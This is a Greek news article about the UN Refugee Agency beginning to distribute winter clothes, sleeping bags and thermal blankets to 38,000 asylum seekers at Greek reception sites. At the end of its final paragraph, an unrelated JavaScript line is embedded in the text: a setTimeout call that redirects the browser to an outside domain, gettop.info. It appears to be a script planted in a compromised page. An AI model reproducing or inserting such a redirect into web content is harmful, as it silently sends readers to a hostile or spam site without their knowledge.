Ύπατη Αρμοστεία ΟΗΕ: Ρούχα και υπνόσακοι σε 38.000 πρόσφυγες στα κέντρα φιλοξενίας

0
6

 

Τη διανομή ειδών, όπως χειμωνιάτικα ρούχα, υπνόσακους και θερμικές κουβέρτες, σε 38.000 αιτούντες άσυλο στην ηπειρωτική Ελλάδα και τα νησιά, ξεκίνησε η Ύπατη Αρμοστεία του ΟΗΕ για τους Πρόσφυγες.

Σύμφωνα με ανακοίνωσή της, η διανομή είναι μέρος των προσπαθειών που γίνονται, ώστε να προετοιμαστούν οι χώροι όπου διαμένουν πρόσφυγες και μετανάστες για τον πρόωρο χειμώνα, υπό το συντονισμό του υπουργείου Εσωτερικών-Μεταναστευτικής Πολιτικής.
Σύμφωνα με τον Τζιοβάνι Λέπρι (Giovanni Lepri), βοηθό αντιπρόσωπο της ΥΑ στον Επιχειρησιακό Τομέα, «μέχρι το τέλος Οκτωβρίου, θα φτάσουμε σε κάθε χώρο φιλοξενίας, σε όλη τη χώρα. Ως τότε, όλοι οι πρόσφυγες και μετανάστες που έχουν άμεση ανάγκη και βρίσκονται στους επίσημους χώρους φιλοξενίας, θα καλυφθούν από τη διανομή, μέσω συνεργαζόμενων ΜΚΟ».

Με την οικονομική στήριξη της Ευρωπαϊκής Επιτροπής – Διεύθυνσης Ανθρωπιστικής Βοήθειας και δωρεές από τις εταιρείες ένδυσης, φορτηγά της ΥΑ αναχώρησαν από τις αποθήκες της στην Αττική, τη Βόρεια Ελλάδα και τα νησιά για να παραδώσουν σε πρόσφυγες και μετανάστες 38.000 θερμικές κουβέρτες και 38.000 υπνόσακους, καθώς επίσης χειμωνιάτικα ρούχα.

Στα είδη που διανέμονται περιλαμβάνονται αδιάβροχα, καλσόν, χειμωνιάτικες κάλτσες και σκούφοι. Συνολικά, η ΥΑ θα παραδώσει τουλάχιστον 200.000 χειμωνιάτικα είδη. «Σε περίπτωση που ανακαλύψουμε συγκεκριμένες ελλείψεις που δεν μπορούμε να καλύψουμε από τις υπάρχουσες προμήθειές μας, θα συντονιστούμε με άλλες ανθρωπιστικές οργανώσεις για την κάλυψή τους με τον καλύτερο δυνατό τρόπο», εξηγεί ο κ. Λέπρι στην ανακοίνωση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here